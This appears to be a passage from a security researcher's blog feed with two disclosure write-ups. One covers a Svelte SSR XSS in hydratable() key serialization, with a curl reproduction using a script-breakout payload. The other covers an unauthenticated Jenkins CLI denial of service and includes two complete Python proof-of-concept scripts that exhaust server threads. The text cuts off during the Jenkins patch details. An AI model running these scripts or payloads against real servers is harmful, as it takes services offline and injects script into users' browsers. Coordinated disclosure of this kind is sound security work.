</content:encoded></item><item><title>CVE-2025-15265: Svelte Hydratable Key SSR XSS - Lydian</title><link>http://caverav.cl/posts/svelte-hydratable-xss/svelte-hydratable-xss/</link><guid isPermaLink="true">http://caverav.cl/posts/svelte-hydratable-xss/svelte-hydratable-xss/</guid><description>A technical write-up of the Svelte async SSR XSS I discovered in hydratable() key serialization, affecting versions 5.46.0 through 5.46.3.</description><pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;Svelte &lt;code&gt;5.46.0&lt;/code&gt; through &lt;code&gt;5.46.3&lt;/code&gt; shipped an SSR XSS in the async hydration pipeline. If an application enabled &lt;code&gt;experimental.async: true&lt;/code&gt; and passed attacker-controlled input as the first argument to &lt;code&gt;hydratable(key, fn)&lt;/code&gt;, Svelte serialized that key into a server-rendered &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; block with &lt;code&gt;JSON.stringify(k)&lt;/code&gt;. Because that output was not HTML-safe for a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; context, an attacker could inject &lt;code&gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;...&lt;/code&gt; and execute arbitrary JavaScript in the victim&apos;s browser.&lt;/p&gt;
&lt;p&gt;The issue was assigned &lt;code&gt;CVE-2025-15265&lt;/code&gt;, publicly disclosed on January 15, 2026, and fixed in &lt;code&gt;svelte@5.46.4&lt;/code&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Why This Matters&lt;/h2&gt;
&lt;p&gt;The bug is subtle because the data is encoded as a JavaScript string, which looks safe at first glance. The problem is that HTML parsing rules win before JavaScript string parsing does. Inside a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; tag, a literal &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; closes the tag even if it appears inside quotes.&lt;/p&gt;
&lt;p&gt;That means this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JSON.stringify(&quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is valid JavaScript string data, but it is still unsafe to embed directly into HTML script content.&lt;/p&gt;
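&lt;p&gt;A one-line check makes the mismatch obvious: the serialized key is a perfectly valid JavaScript string literal, yet it still carries the raw closing-tag sequence the HTML parser keys on. (The &lt;code&gt;\u003C&lt;/code&gt; escapes below are just &lt;code&gt;&amp;lt;&lt;/code&gt;, written that way to keep the snippet markup-safe.)&lt;/p&gt;

```javascript
// Attacker-shaped key, equivalent to '</script><script>alert(1)</script>'.
const payload = '\u003C/script\u003E\u003Cscript\u003Ealert(1)\u003C/script\u003E';

// JSON.stringify produces a valid JS string literal...
const serialized = JSON.stringify(payload);

// ...but the literal still contains the raw '</script' byte sequence,
// which is all the HTML parser needs to terminate the surrounding block.
console.log(serialized.includes('\u003C/script')); // true
```

&lt;p&gt;Safe as JSON, unsafe as inline script content. That is the whole bug in miniature.&lt;/p&gt;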
&lt;hr /&gt;
&lt;h2&gt;The Vulnerable Code Path&lt;/h2&gt;
&lt;p&gt;The affected sink lived in Svelte&apos;s server renderer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// packages/svelte/src/internal/server/renderer.js
entries.push(`[${JSON.stringify(k)},${v.serialized}]`);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That value was later embedded into an inline &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; block in the SSR response to populate &lt;code&gt;window.__svelte.h&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If &lt;code&gt;k&lt;/code&gt; contained attacker-controlled input like &lt;code&gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&lt;/code&gt;, the browser treated it as a real closing tag and executed the injected script.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Reproducing The Bug&lt;/h2&gt;
&lt;p&gt;I built a minimal SvelteKit application with async SSR enabled and a route that forwards a query parameter into &lt;code&gt;hydratable&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// src/routes/+page.server.js
export function load({ url }) {
  return {
    key: url.searchParams.get(&apos;k&apos;) ?? &apos;safe-key&apos;
  };
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!-- src/routes/+page.svelte --&amp;gt;
&amp;lt;script&amp;gt;
  import { hydratable } from &apos;svelte&apos;;

  const { data } = $props();
  const value = await hydratable(data.key, () =&amp;gt; Promise.resolve(&apos;ok&apos;));
&amp;lt;/script&amp;gt;

&amp;lt;div&amp;gt;{value}&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With &lt;code&gt;svelte@5.46.0&lt;/code&gt;, the following request reproduces the issue:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl --globoff \
  &apos;http://127.0.0.1:4173/?k=%3C/script%3E%3Cscript%3EglobalThis.__xss%20%3D%20true%3C/script%3E&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The server responds with HTML containing this inline head script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
  {
    const r = (v) =&amp;gt; Promise.resolve(v);
    const h = (window.__svelte ??= {}).h ??= new Map();

    for (const [k, v] of [
      [&quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&quot;,r(&quot;ok&quot;)]
    ]) {
      h.set(k, v);
    }
  }
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At that point the browser sees a closing &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; tag, exits the original block, and runs the injected payload.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Conditions Required For Exploitation&lt;/h2&gt;
&lt;p&gt;Not every Svelte application was affected. The vulnerable path required all of the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The app used Svelte &lt;code&gt;&amp;gt;=5.46.0&lt;/code&gt; and &lt;code&gt;&amp;lt;=5.46.3&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Async SSR was enabled with &lt;code&gt;experimental.async: true&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The app used &lt;code&gt;hydratable(key, fn)&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;key&lt;/code&gt; could be influenced by untrusted input.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In practice, this is realistic in apps that derive hydration keys from route params, query params, tenant identifiers, or helper functions that wrap &lt;code&gt;hydratable&lt;/code&gt; without validating the key.&lt;/p&gt;
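&lt;p&gt;If an application cannot avoid deriving keys from user input, one defensive pattern is to constrain the key before it ever reaches &lt;code&gt;hydratable&lt;/code&gt;. The helper below is hypothetical (mine, not from Svelte or the advisory), and upgrading remains the real fix:&lt;/p&gt;

```javascript
// Hypothetical helper (not part of Svelte): constrain untrusted input
// to a conservative charset before using it as a hydration key.
function safeHydrationKey(raw, fallback) {
  if (typeof raw !== 'string') return fallback;
  // Letters, digits, underscore, dot, dash; bounded length.
  if (!/^[\w.-]{1,64}$/.test(raw)) return fallback;
  return raw;
}

console.log(safeHydrationKey('user.profile', 'safe-key'));        // 'user.profile'
console.log(safeHydrationKey('\u003C/script\u003E', 'safe-key')); // 'safe-key'
```

&lt;p&gt;The allowlist approach matters here: characters like &lt;code&gt;&amp;lt;&lt;/code&gt;, &lt;code&gt;/&lt;/code&gt;, and quotes never pass, so no markup-shaped key can reach the serializer.&lt;/p&gt;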
&lt;hr /&gt;
&lt;h2&gt;Root Cause&lt;/h2&gt;
&lt;p&gt;This was a context mismatch bug.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;JSON.stringify&lt;/code&gt; is fine for building JavaScript string literals.&lt;/li&gt;
&lt;li&gt;It is not enough when the serialized value is injected into raw HTML inside a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; element.&lt;/li&gt;
&lt;li&gt;The HTML parser does not care that &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; appears inside a quoted JavaScript string.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Svelte already handled hydratable values safely, but the key path used a weaker serializer than the value path.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Fix In 5.46.4&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;5.46.4&lt;/code&gt; patch is small, but it is very deliberate. Upstream changed the serializer used for hydratable keys:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import * as devalue from &apos;devalue&apos;;

// before
entries.push(`[${JSON.stringify(k)},${v.serialized}]`);

// after
entries.push(`[${devalue.uneval(k)},${v.serialized}]`);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That change matters because &lt;code&gt;devalue.uneval&lt;/code&gt; does more than stringify data. It emits a JavaScript expression that is safe to embed inside inline script content, escaping characters that are dangerous in that context, especially &lt;code&gt;&amp;lt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For the malicious payload:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const payload = &quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&quot;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the vulnerable serializer produced:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JSON.stringify(payload)
// =&amp;gt; &quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;while the patched serializer produces:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;devalue.uneval(payload)
// =&amp;gt; &quot;\u003C/script&amp;gt;\u003Cscript&amp;gt;globalThis.__xss = true\u003C/script&amp;gt;&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the key detail. The browser&apos;s HTML parser only breaks out of a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; element when it sees a literal &lt;code&gt;&amp;lt;&lt;/code&gt; starting &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt;. After the patch, there is no literal &lt;code&gt;&amp;lt;&lt;/code&gt; in the serialized key anymore, only &lt;code&gt;\u003C&lt;/code&gt;, so the parser never terminates the surrounding script block early.&lt;/p&gt;
&lt;p&gt;Once the script executes, JavaScript interprets &lt;code&gt;\u003C&lt;/code&gt; as &lt;code&gt;&amp;lt;&lt;/code&gt;, so the application still gets the original string value as the map key. In other words, the patch preserves behavior while removing the HTML parsing hazard.&lt;/p&gt;
&lt;p&gt;This also explains why the fix is better than a narrow one-off replacement. Instead of escaping only one payload pattern, Svelte switched to a serializer designed for JavaScript source generation in inline scripts. That aligns the key path with the safer serialization approach already used elsewhere in the hydration pipeline.&lt;/p&gt;
&lt;p&gt;The release also added a regression test under &lt;code&gt;packages/svelte/tests/runtime-runes/samples/hydratable-script-escape/&lt;/code&gt;. The test uses a payload containing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&apos;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;throw new Error(&quot;pwned&quot;)&amp;lt;/script&amp;gt;&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the old behavior were still present, the injected script would execute during hydration and the test would fail immediately. After the patch, the payload remains inert data inside the generated script, so hydration completes normally.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;This is an SSR XSS, so exploitation happens in the browser of whoever loads the vulnerable page. A successful payload can lead to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;session theft&lt;/li&gt;
&lt;li&gt;DOM tampering&lt;/li&gt;
&lt;li&gt;authenticated actions through injected JavaScript&lt;/li&gt;
&lt;li&gt;account compromise, depending on the application&apos;s session model&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The public advisory rates the issue &lt;code&gt;5.3&lt;/code&gt; (&lt;code&gt;CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N&lt;/code&gt;).&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;December 27, 2025: Vulnerability discovered&lt;/li&gt;
&lt;li&gt;December 29, 2025: Vendor contacted&lt;/li&gt;
&lt;li&gt;January 5, 2026: Vendor replied and confirmed the issue&lt;/li&gt;
&lt;li&gt;January 15, 2026: Fix released in &lt;code&gt;svelte@5.46.4&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;January 15, 2026: Public disclosure and &lt;code&gt;CVE-2025-15265&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/lydian&quot;&gt;Fluid Attacks advisory: Lydian&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/sveltejs/svelte/security/advisories/GHSA-6738-r8g5-qwp3&quot;&gt;GitHub advisory: GHSA-6738-r8g5-qwp3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/sveltejs/svelte/releases/tag/svelte%405.46.4&quot;&gt;Svelte release &lt;code&gt;5.46.4&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/sveltejs/svelte&quot;&gt;Svelte repository&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
</content:encoded></item><item><title>CVE-2025-67635: Unauthenticated DoS in the Jenkins CLI full-duplex endpoint</title><link>http://caverav.cl/posts/jenkins-cli-dos/jenkins-cli-dos/</link><guid isPermaLink="true">http://caverav.cl/posts/jenkins-cli-dos/jenkins-cli-dos/</guid><description>[Race conditions](https://db.fluidattacks.com/wek/124/) and missing timeouts in Jenkins&apos; plain CLI endpoint let anyone exhaust servlet threads without Overall/Read.</description><pubDate>Fri, 12 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Jenkins’ plain CLI endpoint (&lt;code&gt;/cli?remoting=false&lt;/code&gt;) pairs two POST requests (download/upload) via a shared &lt;code&gt;Session&lt;/code&gt; UUID and is reachable without Overall/Read.&lt;/li&gt;
&lt;li&gt;Two bugs stack: an unsynchronized &lt;code&gt;HashMap&lt;/code&gt; in &lt;code&gt;CLIAction&lt;/code&gt; drops one half of the session (&lt;a href=&quot;https://db.fluidattacks.com/wek/124/&quot;&gt;race condition&lt;/a&gt;), and the CLI protocol wait loops (&lt;code&gt;ServerSideImpl.run&lt;/code&gt;, &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt;) have &lt;strong&gt;no timeout&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Attackers can finish their HTTP calls in milliseconds yet strand Jetty threads for 15s (race window) or indefinitely (abandoned protocol), causing controller-wide &lt;a href=&quot;https://db.fluidattacks.com/wek/002/&quot;&gt;asymmetric DoS&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Affects core ≤ 2.540 and LTS ≤ 2.528.2 (CWE-362/CWE-404, CVSS 7.5). Fixed in 2.541 / 2.528.3 by using &lt;code&gt;ConcurrentHashMap&lt;/code&gt;, adding handshake timeouts, and closing streams on error.&lt;/li&gt;
&lt;li&gt;Mitigate now: upgrade, or block the plain CLI endpoint from untrusted networks, and capture thread dumps to confirm no threads sit in &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; or &lt;code&gt;FullDuplexHttpService.upload/download&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;What the endpoint does&lt;/h2&gt;
&lt;p&gt;The non-Remoting CLI builds a full-duplex channel from two HTTP POSTs:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Download side&lt;/strong&gt;: &lt;code&gt;Side: download&lt;/code&gt; opens &lt;code&gt;/cli?remoting=false&lt;/code&gt;; the server writes a byte and waits for the upload half.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Upload side&lt;/strong&gt;: &lt;code&gt;Side: upload&lt;/code&gt;, same &lt;code&gt;Session&lt;/code&gt; UUID, provides the input stream.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;hudson.cli.CLIAction&lt;/code&gt; wires this to &lt;code&gt;jenkins.util.FullDuplexHttpService&lt;/code&gt;, storing active sessions in a cross-request registry.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Root cause #1 - unsynchronized session registry (&lt;a href=&quot;https://db.fluidattacks.com/wek/124/&quot;&gt;race condition&lt;/a&gt;)&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;CLIAction&lt;/code&gt; keeps the session map in a plain &lt;code&gt;HashMap&lt;/code&gt; shared by all request threads:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// core/src/main/java/hudson/cli/CLIAction.java:83
private final transient Map&amp;lt;UUID, FullDuplexHttpService&amp;gt; duplexServices = new HashMap&amp;lt;&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;FullDuplexHttpService.Response.generateResponse&lt;/code&gt; does &lt;code&gt;services.put(uuid, service)&lt;/code&gt; for the download side, and &lt;code&gt;services.get(uuid)&lt;/code&gt; for the upload side. Because &lt;code&gt;HashMap&lt;/code&gt; is not thread-safe, concurrent puts/gets under load can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Return &lt;code&gt;null&lt;/code&gt; for a valid download side&lt;/li&gt;
&lt;li&gt;Drop entries during a resize&lt;/li&gt;
&lt;li&gt;Leave download threads inside &lt;code&gt;FullDuplexHttpService.download&lt;/code&gt; waiting up to 15 s for an upload that already arrived&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Result: every racy pair ties up a servlet thread for the full timeout while the attacker’s sockets close immediately, causing an &lt;a href=&quot;https://db.fluidattacks.com/wek/002/&quot;&gt;asymmetric DoS&lt;/a&gt; and violating &lt;a href=&quot;https://db.fluidattacks.com/req/337/&quot;&gt;REQ-337&lt;/a&gt; (“Make critical logic flows thread safe”).&lt;/p&gt;
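&lt;p&gt;The fix idea can be sketched in a few lines. The snippet below is a hypothetical Python analog, not the Jenkins code (the actual Java fix swaps the &lt;code&gt;HashMap&lt;/code&gt; for a &lt;code&gt;ConcurrentHashMap&lt;/code&gt;; the class and method names here are invented for illustration): guard every put/get on the session registry so concurrent request threads can never observe a torn map state:&lt;/p&gt;

```python
import threading
import uuid

# Hypothetical sketch of the registry fix: serialize access to the
# session map so a download-side put and an upload-side get for the
# same UUID always see a consistent state.
class SessionRegistry:
    def __init__(self):
        self._lock = threading.Lock()
        self._services = {}

    def register_download(self, session_id, service):
        # Download half publishes its service under the shared UUID.
        with self._lock:
            self._services[session_id] = service

    def take_upload(self, session_id):
        # Upload half claims (and consumes) its counterpart, or gets
        # None if the download half truly never registered.
        with self._lock:
            return self._services.pop(session_id, None)

reg = SessionRegistry()
sid = uuid.uuid4()
reg.register_download(sid, 'download-side')
assert reg.take_upload(sid) == 'download-side'
assert reg.take_upload(sid) is None  # each pairing is consumed once
```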
&lt;hr /&gt;
&lt;h2&gt;Root cause #2 - missing protocol timeouts (deterministic hang)&lt;/h2&gt;
&lt;p&gt;Even when the two halves pair correctly, the protocol handshake can deadlock because neither side times out:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// core/src/main/java/hudson/cli/CLIAction.java:300
synchronized (this) {
    while (!ready) {      // waits forever if client never sends &quot;start&quot;
        wait();
    }
}
// core/src/main/java/jenkins/util/FullDuplexHttpService.java:145
while (!completed) {       // no deadline if download side dies early
    wait();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the client drops the connection before sending CLI frames, the download thread blocks in &lt;code&gt;ServerSideImpl.run()&lt;/code&gt; and the upload thread blocks in &lt;code&gt;upload()&lt;/code&gt; &lt;strong&gt;with no timeout&lt;/strong&gt;, consuming two Jetty threads per attempt until the controller is exhausted.&lt;/p&gt;
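&lt;p&gt;The remediation pattern for these loops is a deadline-bounded wait. The sketch below is a hypothetical Python analog of the &lt;code&gt;CONNECTION_TIMEOUT&lt;/code&gt;-bounded waits the patch introduced, not the actual Jenkins code: the condition loop re-checks a shrinking deadline instead of calling &lt;code&gt;wait()&lt;/code&gt; with no bound, so an abandoned handshake unwinds instead of parking the thread forever:&lt;/p&gt;

```python
import threading
import time

# Hypothetical sketch: bounded wait loop (names invented).
def wait_for_ready(cond, state, timeout):
    deadline = time.monotonic() + timeout
    with cond:
        while not state['ready']:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                return False  # give up: the counterpart never arrived
            # Re-check the predicate on every wakeup; the deadline
            # bounds the total time spent here.
            cond.wait(remaining)
    return True

cond = threading.Condition()
state = {'ready': False}
# No upload side ever signals readiness; the bounded wait returns
# instead of blocking indefinitely.
assert wait_for_ready(cond, state, timeout=0.2) is False
```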
&lt;hr /&gt;
&lt;h2&gt;Exploitation notes&lt;/h2&gt;
&lt;p&gt;Both vectors require only network reachability to &lt;code&gt;/cli&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Scenario A (&lt;a href=&quot;https://db.fluidattacks.com/wek/124/&quot;&gt;race condition&lt;/a&gt;)&lt;/strong&gt;: fire overlapping download/upload pairs with slight jitter so the upload half occasionally sees &lt;code&gt;null&lt;/code&gt;. Threads pile up in &lt;code&gt;FullDuplexHttpService.download&lt;/code&gt; for ~15 s each.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scenario B (abandonment)&lt;/strong&gt;: open both halves, let them pair, then close without sending CLI frames. Threads stay in &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; and &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt; indefinitely, no timing window needed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below are the exact PoCs shared with the Jenkins security team:&lt;/p&gt;
&lt;h3&gt;PoC: racecond_a.py (HashMap race, two downloads per UUID)&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env python3
import requests
import uuid
import concurrent.futures
import sys

def create_download(jenkins_url, session_id, session):
    headers = {&apos;Session&apos;: session_id, &apos;Side&apos;: &apos;download&apos;}
    try:
        response = session.post(
            f&quot;{jenkins_url}/cli?remoting=false&quot;,
            headers=headers,
            data=b&apos;&apos;,
            timeout=20
        )
        return response.status_code
    except requests.exceptions.Timeout:
        return &apos;TIMEOUT&apos;
    except Exception:
        return &apos;ERROR&apos;

def main(jenkins_url, num_sessions):
    session = requests.Session()
    adapter = requests.adapters.HTTPAdapter(
        max_retries=0,
        pool_connections=200,
        pool_maxsize=200
    )
    session.mount(&apos;http://&apos;, adapter)
    session.mount(&apos;https://&apos;, adapter)
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=200) as executor:
        futures = []
        
        for i in range(num_sessions):
            session_id = str(uuid.uuid4())
            futures.append(executor.submit(create_download, jenkins_url, session_id, session))
            futures.append(executor.submit(create_download, jenkins_url, session_id, session))
        
        timeouts = 0
        for future in concurrent.futures.as_completed(futures):
            if future.result() == &apos;TIMEOUT&apos;:
                timeouts += 1
    
    print(f&quot;Timeouts: {timeouts}/{num_sessions*2}&quot;)

if __name__ == &quot;__main__&quot;:
    jenkins_url = sys.argv[1] if len(sys.argv) &amp;gt; 1 else &quot;http://localhost:8081&quot;
    num_sessions = int(sys.argv[2]) if len(sys.argv) &amp;gt; 2 else 1000
    main(jenkins_url, num_sessions)
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;PoC: racecond_b.py (protocol abandonment, deterministic hang)&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env python3
import socket
import struct
import uuid
import time
import threading
import sys

JENKINS_HOST = &quot;localhost&quot;
JENKINS_PORT = 8081

OP_ARG = 0
OP_LOCALE = 1
OP_ENCODING = 2

def send_cli_frame(sock, opcode, data=b&quot;&quot;):
    if isinstance(data, str):
        data = data.encode(&apos;utf-8&apos;)
    length = len(data)
    frame = struct.pack(&apos;&amp;gt;I&apos;, length) + struct.pack(&apos;B&apos;, opcode) + data
    sock.sendall(frame)

def establish_download(session_id, duration=30):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((JENKINS_HOST, JENKINS_PORT))
        request = f&quot;&quot;&quot;POST /cli?remoting=false HTTP/1.1\r
Host: {JENKINS_HOST}:{JENKINS_PORT}\r
Session: {session_id}\r
Side: download\r
Content-Length: 0\r
Connection: keep-alive\r
\r
&quot;&quot;&quot;
        sock.sendall(request.encode())
        response = b&quot;&quot;
        while b&quot;\r\n\r\n&quot; not in response:
            chunk = sock.recv(1)
            if not chunk:
                return False
            response += chunk
        sock.recv(1)
        time.sleep(duration)
        sock.close()
        return True
    except Exception:
        return False

def establish_upload_without_start(session_id, duration=30):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((JENKINS_HOST, JENKINS_PORT))
        request = f&quot;&quot;&quot;POST /cli?remoting=false HTTP/1.1\r
Host: {JENKINS_HOST}:{JENKINS_PORT}\r
Session: {session_id}\r
Side: upload\r
Transfer-Encoding: chunked\r
Connection: keep-alive\r
\r
&quot;&quot;&quot;
        sock.sendall(request.encode())
        response = b&quot;&quot;
        while b&quot;\r\n\r\n&quot; not in response:
            chunk = sock.recv(1)
            if not chunk:
                return False
            response += chunk
        send_cli_frame(sock, OP_ARG, &quot;help&quot;)
        time.sleep(0.05)
        send_cli_frame(sock, OP_LOCALE, &quot;en_US&quot;)
        time.sleep(0.05)
        send_cli_frame(sock, OP_ENCODING, &quot;UTF-8&quot;)
        time.sleep(duration)
        sock.close()
        return True
    except Exception:
        return False

def create_abandoned_session(session_id, duration=30):
    download_thread = threading.Thread(
        target=establish_download,
        args=(session_id, duration),
        daemon=True
    )
    download_thread.start()
    time.sleep(0.3)
    upload_thread = threading.Thread(
        target=establish_upload_without_start,
        args=(session_id, duration),
        daemon=True
    )
    upload_thread.start()
    return download_thread, upload_thread

def main(num_sessions):
    threads = []
    for i in range(num_sessions):
        session_id = str(uuid.uuid4())
        download_t, upload_t = create_abandoned_session(session_id, duration=60)
        threads.extend([download_t, upload_t])
        time.sleep(0.1)
    
    for t in threads:
        t.join()
    
    print(f&quot;Created {num_sessions} sessions&quot;)

if __name__ == &quot;__main__&quot;:
    num_sessions = int(sys.argv[1]) if len(sys.argv) &amp;gt; 1 else 500
    main(num_sessions)
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Evidence&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Thread dump (Scenario B, Jenkins 2.516.2 test controller)&lt;/strong&gt; – stuck in the exact call sites with no timeout:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;at hudson.cli.CLIAction$ServerSideImpl.run(CLIAction.java:319)
- locked &amp;lt;0x00000000f0d9ba90&amp;gt; (a hudson.cli.CLIAction$ServerSideImpl)
at jenkins.util.FullDuplexHttpService.download(FullDuplexHttpService.java:119)

at jenkins.util.FullDuplexHttpService.upload(FullDuplexHttpService.java:146)
- locked &amp;lt;0x00000000f0d9aaa0&amp;gt; (a hudson.cli.CLIAction$PlainCliEndpointResponse$1)
at jenkins.util.FullDuplexHttpService$Response.generateResponse(FullDuplexHttpService.java:191)
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Video evidence&lt;/strong&gt;: end-to-end crash reproduction against a fresh controller:
&amp;lt;iframe src=&quot;https://www.youtube.com/embed/zl7bp5FN5Bk&quot; title=&quot;Jenkins CLI DoS (SECURITY-3630) crash capture&quot; width=&quot;100%&quot; height=&quot;360&quot; allowfullscreen loading=&quot;lazy&quot;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/li&gt;
&lt;li&gt;On a vulnerable build you will see dozens of request threads waiting in those call sites, and regular CLI calls start timing out.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Unauthenticated DoS&lt;/strong&gt;: no Overall/Read required to hit &lt;code&gt;/cli?remoting=false&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low attacker cost&lt;/strong&gt;: sockets close immediately; the server holds the work (15 s per race attempt, indefinite for abandonment).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Controller-wide degradation&lt;/strong&gt;: servlet threads and I/O streams back up, other endpoints time out.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Patch details (core commit &lt;a href=&quot;https://github.com/jenkinsci/jenkins/commit/efa1816322026f2b9235a27eee814bcc7ba0a764&quot;&gt;efa1816&lt;/a&gt;)&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;CLIAction&lt;/code&gt; now stores sessions in a &lt;code&gt;ConcurrentHashMap&lt;/code&gt;, removing the racy &lt;code&gt;HashMap&lt;/code&gt; drops that powered the &lt;a href=&quot;https://db.fluidattacks.com/wek/002/&quot;&gt;asymmetric DoS&lt;/a&gt;.&lt;/li&gt;
